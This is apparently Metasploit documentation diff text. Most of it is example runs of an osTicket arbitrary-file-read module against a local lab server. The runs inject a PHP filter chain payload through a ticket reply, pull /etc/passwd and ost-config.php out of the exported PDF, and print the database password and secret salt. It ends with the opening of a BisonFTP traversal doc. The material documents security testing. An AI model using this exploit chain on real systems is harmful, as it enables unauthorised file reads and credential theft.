+[*] osticket_login_client: GET /login.php
+[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
+[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=aa3f025a7693418fa66d8691f39bc60d28ed0791
+[*] osticket_login_client: POST /login.php with luser=test
+[*] osticket_login_client: POST response code=302, body contains luser=false
+[+] osticket_login_client: Login SUCCESS
+[+] do_login: Client portal login succeeded, cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
+[+] Authenticated via client portal
+[*] Locating ticket...
+[*] find_ticket_id: GET /tickets.php (looking for ticket #527686)
+[*] find_ticket_id: Using cookies=OSTSESSID=1ldkhkadfl2rqur16lnf4ru5od;
+[*] find_ticket_id: Ticket listing response code=200, body=6856 bytes
+[*] find_ticket_id: Body Length:
+6856
+[+] find_ticket_id: Found ticket ID=2 from listing page
+[+] Ticket #527686 has internal ID: 2
+[*] Generating PHP filter chain payload...
+[*] Payload generated (13646 bytes)
+[*] Submitting payload as ticket reply...
+[*] submit_ticket_reply: GET /tickets.php?id=2 to fetch CSRF token
+[*] submit_ticket_reply: GET response code=200, body=23979 bytes
+[*] extract_csrf_token: Searching HTML (23979 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=917409710733c0ab9c26758c5e4096531ded2441
+[*] submit_ticket_reply: Using textarea field '70211e92acc5d1', payload=13646 bytes
+[*] submit_ticket_reply: POST /tickets.php with a=reply, id=2
+[*] submit_ticket_reply: POST response code=200, body=38488 bytes
+[*] submit_ticket_reply: Success indicators found=true
+[+] Reply posted successfully
+[*] Downloading ticket PDF...
+[*] download_ticket_pdf: Trying PDF export from /tickets.php
+[*] download_ticket_pdf: GET /tickets.php?a=print&id=2
+[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=54429
+[+] download_ticket_pdf: Got PDF (54429 bytes)
+[+] PDF downloaded (54429 bytes)
+[*] Extracting file from PDF...
+[*] extract_files_from_pdf: Processing PDF (54429 bytes)
+[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
+[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
+[*] extract_files_from_pdf: Found 2 image XObject streams
+[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
+[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
+[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
+[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
+[*] First 96 bytes of data after marker and null-strip:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[*] Data looks like base64? false
+[*] Treating as plain (non-base64) - preview:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
+[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
+[*] extract_files_from_pdf: Total extracted files: 1
+[+] Extracted 1235 bytes
+
+======================================================================
+EXTRACTED FILE CONTENTS
+======================================================================
+
+--- [/etc/passwd] (1235 bytes) ---
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+mysql:
+[+] Saved to: /home/tintin/.msf4/loot/20260222194305_default_1_osticket.etc_pas_161216.bin
+
+[+] Exploitation complete
+[*] Auxiliary module execution completed
+```
+
+
+### With Administrator user 
+```
+msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME administrator
+USERNAME => administrator
+msf auxiliary(gather/osticket_arbitrary_file_read) > set TICKET_NUMBER 527686
+TICKET_NUMBER => 527686
+msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
+RHOSTS => http://localhost:8080/
+msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD administrator
+PASSWORD => administrator
+msf auxiliary(gather/osticket_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] is_osticket?: Response code=200, body length=4943
+[*] is_osticket?: osTicket signature FOUND in response body
+[!] The service is running, but could not be validated. Target appears to be an osTicket installation
+[*] Target: 127.0.0.1:8080
+[*] File to extract: /etc/passwd
+[*] Attempting authentication...
+[*] do_login: portal preference=auto, base_uri=/, username=administrator
+[*] do_login: Trying staff panel (/scp/) login...
+[*] osticket_login_scp: GET /scp/login.php
+[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
+[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
+[*] osticket_login_scp: POST /scp/login.php with userid=administrator
+[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
+[+] osticket_login_scp: Login SUCCESS
+[+] do_login: SCP login succeeded, cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
+[+] Authenticated via scp portal
+[*] Locating ticket...
+[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
+[*] find_ticket_id: Using cookies=OSTSESSID=1in45o31u3itsmsr3u5848gr83;
+[*] find_ticket_id: Ticket listing response code=200, body=23649 bytes
+[*] find_ticket_id: Body Length:
+23649
+[+] find_ticket_id: Found ticket ID=1 from listing page
+[+] Ticket #527686 has internal ID: 1
+[*] Generating PHP filter chain payload...
+[*] Payload generated (13646 bytes)
+[*] Submitting payload as ticket reply...
+[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
+[+] acquire_lock_code: Got lock code from JSON response
+[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
+[*] submit_ticket_reply: GET response code=200, body=57517 bytes
+[*] extract_csrf_token: Searching HTML (57517 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=f467a6da2cdee133ab691be6cc479ad9909824b0
+[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
+[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
+[*] submit_ticket_reply: POST response code=302, body=13 bytes
+[+] submit_ticket_reply: Got 302 redirect - reply accepted
+[+] Reply posted successfully
+[*] Downloading ticket PDF...
+[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
+[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
+[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=71895
+[+] download_ticket_pdf: Got PDF (71895 bytes)
+[+] PDF downloaded (71895 bytes)
+[*] Extracting file from PDF...
+[*] extract_files_from_pdf: Processing PDF (71895 bytes)
+[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
+[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
+[*] extract_files_from_pdf: Found 2 image XObject streams
+[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
+[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
+[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
+[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
+[*] First 96 bytes of data after marker and null-strip:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[*] Data looks like base64? false
+[*] Treating as plain (non-base64) - preview:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
+[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
+[*] extract_files_from_pdf: Total extracted files: 1
+[+] Extracted 1235 bytes
+
+======================================================================
+EXTRACTED FILE CONTENTS
+======================================================================
+
+--- [/etc/passwd] (1235 bytes) ---
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+mysql:
+[+] Saved to: /home/tintin/.msf4/loot/20260222194158_default_127.0.0.1_osticket.etc_pas_205832.bin
+
+[+] Exploitation complete
+[*] Running module against ::1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] is_osticket?: Response code=200, body length=4943
+[*] is_osticket?: osTicket signature FOUND in response body
+[!] The service is running, but could not be validated. Target appears to be an osTicket installation
+[*] Target: ::1:8080
+[*] File to extract: /etc/passwd
+[*] Attempting authentication...
+[*] do_login: portal preference=auto, base_uri=/, username=administrator
+[*] do_login: Trying staff panel (/scp/) login...
+[*] osticket_login_scp: GET /scp/login.php
+[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
+[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
+[*] osticket_login_scp: POST /scp/login.php with userid=administrator
+[*] osticket_login_scp: POST response code=302, url=index.php, body contains userid=false
+[+] osticket_login_scp: Login SUCCESS
+[+] do_login: SCP login succeeded, cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
+[+] Authenticated via scp portal
+[*] Locating ticket...
+[*] find_ticket_id: GET /scp/tickets.php (looking for ticket #527686)
+[*] find_ticket_id: Using cookies=OSTSESSID=qqa1df1k3ajku81n4vbkloeibq;
+[*] find_ticket_id: Ticket listing response code=200, body=23647 bytes
+[*] find_ticket_id: Body Length:
+23647
+[+] find_ticket_id: Found ticket ID=1 from listing page
+[+] Ticket #527686 has internal ID: 1
+[*] Generating PHP filter chain payload...
+[*] Payload generated (13646 bytes)
+[*] Submitting payload as ticket reply...
+[*] acquire_lock_code: POST /scp/ajax.php/lock/ticket/1
+[+] acquire_lock_code: Got lock code from JSON response
+[*] submit_ticket_reply: GET /scp/tickets.php?id=1 to fetch CSRF token
+[*] submit_ticket_reply: GET response code=200, body=73937 bytes
+[*] extract_csrf_token: Searching HTML (73937 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=1ddff80315e6dcc127eb115ccf65e4307c1225aa
+[*] submit_ticket_reply: Using textarea field 'response', payload=13646 bytes
+[*] submit_ticket_reply: POST /scp/tickets.php with a=reply, id=1
+[*] submit_ticket_reply: POST response code=302, body=13 bytes
+[+] submit_ticket_reply: Got 302 redirect - reply accepted
+[+] Reply posted successfully
+[*] Downloading ticket PDF...
+[*] download_ticket_pdf: Trying PDF export from /scp/tickets.php
+[*] download_ticket_pdf: GET /scp/tickets.php?a=print&id=1
+[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=72070
+[+] download_ticket_pdf: Got PDF (72070 bytes)
+[+] PDF downloaded (72070 bytes)
+[*] Extracting file from PDF...
+[*] extract_files_from_pdf: Processing PDF (72070 bytes)
+[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
+[*] extract_pdf_image_streams: Found image object (1239 bytes decompressed)
+[*] extract_files_from_pdf: Found 2 image XObject streams
+[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
+[*] extract_files_from_pdf: Image #1: 1239 bytes, swapped to BGR
+[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 1239-byte stream
+[*] extract_data_from_bmp_stream: 1235 bytes after marker (nulls stripped)
+[*] First 96 bytes of data after marker and null-strip:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[*] Data looks like base64? false
+[*] Treating as plain (non-base64) - preview:
+[*]   ascii: "root:x:0:0:root:/root:/bin/bash.daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin.bin:x:2:2:bin:/b"
+[*]   hex:   72 6f 6f 74 3a 78 3a 30 3a 30 3a 72 6f 6f 74 3a 2f 72 6f 6f 74 3a 2f 62 69 6e 2f 62 61 73 68 0a 64 61 65 6d 6f 6e 3a 78 3a 31 3a 31 3a 64 61 65 6d 6f 6e 3a 2f 75 73 72 2f 73 62 69 6e 3a 2f 75 73 72 2f 73 62 69 6e 2f 6e 6f 6c 6f 67 69 6e 0a 62 69 6e 3a 78 3a 32 3a 32 3a 62 69 6e 3a 2f 62
+[+] extract_files_from_pdf: Image #1 yielded 1235 bytes of extracted data
+[*] extract_files_from_pdf: Fallback - scanning 16 raw streams
+[*] extract_files_from_pdf: Total extracted files: 1
+[+] Extracted 1235 bytes
+
+======================================================================
+EXTRACTED FILE CONTENTS
+======================================================================
+
+--- [/etc/passwd] (1235 bytes) ---
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+mysql:
+[+] Saved to: /home/tintin/.msf4/loot/20260222194159_default_1_osticket.etc_pas_624998.bin
+
+[+] Exploitation complete
+[*] Auxiliary module execution completed
+```
+
+### Without Specifying Ticket Number
+
+```
+msf auxiliary(gather/osticket_arbitrary_file_read) > set USERNAME newuser
+USERNAME => newuser
+msf auxiliary(gather/osticket_arbitrary_file_read) > set VERBOSE true
+VERBOSE => true
+msf auxiliary(gather/osticket_arbitrary_file_read) > set RHOSTS http://localhost:8080/
+RHOSTS => http://localhost:8080/
+msf auxiliary(gather/osticket_arbitrary_file_read) > set PASSWORD newuser
+PASSWORD => newuser
+msf auxiliary(gather/osticket_arbitrary_file_read) > run
+[*] Running module against 127.0.0.1
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] is_osticket?: Response code=200, body length=4943
+[*] is_osticket?: osTicket signature FOUND in response body
+[!] The service is running, but could not be validated. Target appears to be an osTicket installation
+[*] Target: 127.0.0.1:8080
+[*] File to extract: include/ost-config.php
+[*] Attempting authentication...
+[*] do_login: portal preference=auto, base_uri=/, username=newuser
+[*] do_login: Trying staff panel (/scp/) login...
+[*] osticket_login_scp: GET /scp/login.php
+[*] osticket_login_scp: GET response code=200, cookies=OSTSESSID=uf493kdg73eh3bf11pmcv6ed54;
+[*] extract_csrf_token: Searching HTML (6504 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=0e9e898a719233e0a4ecec120cd047d0cd9507ee
+[*] osticket_login_scp: POST /scp/login.php with userid=newuser
+[*] osticket_login_scp: POST response code=200, url=, body contains userid=true
+[-] osticket_login_scp: Login FAILED (still see login form)
+[*] do_login: Staff panel login failed
+[*] do_login: Trying client portal login...
+[*] osticket_login_client: GET /login.php
+[*] osticket_login_client: GET response code=200, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
+[*] extract_csrf_token: Searching HTML (5213 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=dba0292e34ca0ff8fc036933d4d6db2a2eb791df
+[*] osticket_login_client: POST /login.php with luser=newuser
+[*] osticket_login_client: POST response code=302, body contains luser=false
+[+] osticket_login_client: Login SUCCESS
+[+] do_login: Client portal login succeeded, cookies=OSTSESSID=6cei75oh450nmtfni8a5tqps2o;
+[+] Authenticated via client portal
+[!] No TICKET_NUMBER supplied — a new ticket will be created each time this module runs
+[*] create_ticket: GET /open.php
+[*] extract_csrf_token: Searching HTML (6579 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
+[*] detect_open_form_fields: topicId=2
+[*] fetch_topic_form_fields: GET /ajax.php/form/help-topic/2
+[*] fetch_topic_form_fields: subject="eac457d4f21b58", message="56f3da3b9db7ae"
+[*] create_ticket: POST /open.php (topicId=2)
+[*] create_ticket: POST response code=302
+[+] create_ticket: Ticket created, internal ID=12
+[*] fetch_ticket_number: GET /tickets.php?id=12
+[+] fetch_ticket_number: Ticket number=#169169
+[+] Created ticket #169169 (internal ID: 12)
+[*] Generating PHP filter chain payload...
+[*] Payload generated (13656 bytes)
+[*] Submitting payload as ticket reply...
+[*] submit_ticket_reply: GET /tickets.php?id=12 to fetch CSRF token
+[*] submit_ticket_reply: GET response code=200, body=9618 bytes
+[*] extract_csrf_token: Searching HTML (9618 bytes) for __CSRFToken__
+[+] extract_csrf_token: Found token=7cc418ea2a3fff84b6593ad2928a7e7c66e4745d
+[*] submit_ticket_reply: Using textarea field '56f3da3b9db7ae', payload=13656 bytes
+[*] submit_ticket_reply: POST /tickets.php with a=reply, id=12
+[*] submit_ticket_reply: POST response code=200, body=24137 bytes
+[*] submit_ticket_reply: Success indicators found=true
+[+] Reply posted successfully
+[*] Downloading ticket PDF...
+[*] download_ticket_pdf: Trying PDF export from /tickets.php
+[*] download_ticket_pdf: GET /tickets.php?a=print&id=12
+[*] download_ticket_pdf: Response code=200, Content-Type=application/pdf, magic="%PDF", size=57262
+[+] download_ticket_pdf: Got PDF (57262 bytes)
+[+] PDF downloaded (57262 bytes)
+[*] Extracting file from PDF...
+[*] extract_files_from_pdf: Processing PDF (57262 bytes)
+[*] extract_pdf_image_streams: Found image object (139060 bytes decompressed)
+[*] extract_pdf_image_streams: Found image object (6357 bytes decompressed)
+[*] extract_files_from_pdf: Found 2 image XObject streams
+[*] extract_files_from_pdf: Image #0: 139060 bytes, swapped to BGR
+[*] extract_files_from_pdf: Image #1: 6357 bytes, swapped to BGR
+[*] extract_data_from_bmp_stream: ISO-2022-KR marker found at offset 0 in 6357-byte stream
+[*] extract_data_from_bmp_stream: 6353 bytes after marker (nulls stripped)
+[*] First 96 bytes of data after marker and null-strip:
+[*]   ascii: "<?php./*********************************************************************.    ost-config.php."
+[*]   hex:   3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
+[*] Data looks like base64? false
+[*] Treating as plain (non-base64) - preview:
+[*]   ascii: "<?php./*********************************************************************.    ost-config.php."
+[*]   hex:   3c 3f 70 68 70 0a 2f 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0a 20 20 20 20 6f 73 74 2d 63 6f 6e 66 69 67 2e 70 68 70 0a
+[+] extract_files_from_pdf: Image #1 yielded 6353 bytes of extracted data
+[*] extract_files_from_pdf: Fallback - scanning 12 raw streams
+[*] extract_files_from_pdf: Total extracted files: 1
+[+] Extracted 6353 bytes
+
+======================================================================
+EXTRACTED FILE CONTENTS
+======================================================================
+
+--- [include/ost-config.php] (6353 bytes) ---
+<?php
+/*********************************************************************
+    ost-config.php
+
+    Static osTicket configuration file. Mainly useful for mysql login info.
+    Created during installation process and shouldn't change even on upgrades.
+
+    Peter Rotich <peter@osticket.com>
+    Copyright (c)  2006-2010 osTicket
+    http://www.osticket.com
+
+    Released under the GNU General Public License WITHOUT ANY WARRANTY.
+    See LICENSE.TXT for details.
+
+    vim: expandtab sw=4 ts=4 sts=4:
+    $Id: $
+**********************************************************************/
+
+#Disable direct access.
+if(!strcasecmp(basename($_SERVER['SCRIPT_NAME']),basename(__FILE__)) || !defined('INCLUDE_DIR'))
+    die('kwaheri rafiki!');
+
+#Install flag
+define('OSTINSTALLED',TRUE);
+if(OSTINSTALLED!=TRUE){
+    if(!file_exists(ROOT_DIR.'setup/install.php')) die('Error: Contact system admin.'); //Something is really wrong!
+    //Invoke the installer.
+    header('Location: '.ROOT_PATH.'setup/install.php');
+    exit;
+}
+
+# Encrypt/Decrypt secret key - randomly generated during installation.
+define('SECRET_SALT','ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P');
+
+#Default admin email. Used only on db connection issues and related alerts.
+define('ADMIN_EMAIL','administrator@localhost.local');
+
+# Database Options
+# ====================================================
+# Mysql Login info
+#
+define('DBTYPE','mysql');
+#  DBHOST can have comma separated hosts (e.g db1:6033,db2:6033)
+define('DBHOST','localhost');
+define('DBNAME','osticket_db');
+define('DBUSER','osticket_user');
+define('DBPASS','P@ssw0rd123!');
+
+# Database TCP/IP Connect Timeout (default: 3 seconds)
+# Timeout is important when DBHOST has multiple proxies to try
+# define('DBCONNECT_TIMEOUT', 3);
+
+# Table prefix
+define('TABLE_PREFIX','ost_');
+
+#
+# SSL Options
+# ---------------------------------------------------
+# SSL options for MySQL can be enabled by adding a certificate allowed by
+# the database server here. To use SSL, you must have a client certificate
+# signed by a CA (certificate authority). You can easily create this
+# yourself with the EasyRSA suite. Give the public CA certificate, and both
+# the public and private parts of your client certificate below.
+#
+# Once configured, you can ask MySQL to require the certificate for
+# connections:
+#
+# > create user osticket;
+# > grant all on osticket.* to osticket require subject '<subject>';
+#
+# More information (to-be) available in doc/security/hardening.md
+
+# define('DBSSLCA','/path/to/ca.crt');
+# define('DBSSLCERT','/path/to/client.crt');
+# define('DBSSLKEY','/path/to/client.key');
+
+#
+# Mail Options
+# ===================================================
+# Option: MAIL_EOL (default: \n)
+#
+# Some mail setups do not handle emails with \r\n (CRLF) line endings for
+# headers and base64 and quoted-response encoded bodies. This is an error
+# and a violation of the internet mail RFCs. However, because this is also
+# outside the control of both osTicket development and many server
+#
+
+... (truncated)
+[+] Saved to: /home/tintin/.msf4/loot/20260321104202_default_127.0.0.1_osticket.include_866909.php
+
+======================================================================
+KEY FINDINGS
+======================================================================
+[+]   SECRET_SALT: ELPqrKK_aF5JLxk9M0uz__EFFP3Jxn0P
+[+]   ADMIN_EMAIL: administrator@localhost.local
+[+]   DBHOST: localhost
+[+]   DBNAME: osticket_db
+[+]   DBUSER: osticket_user
+[+]   DBPASS: P@ssw0rd123!
+[!] No active DB -- Credential data will not be saved!
+
+[+] Exploitation complete
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/scanner/ftp/bison_ftp_traversal.md

@@ -0,0 +1,83 @@
+## Vulnerable Application
+
+This module exploits a directory traversal vulnerability in BisonWare BisonFTP Server
+version 3.5. The flaw allows an attacker to download arbitrary files from the server by
+sending a crafted `RETR` command using traversal strings such as `..//`.
+
+The vulnerability is tracked as [CVE-2015-7602](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602).
+
+### Setup
+
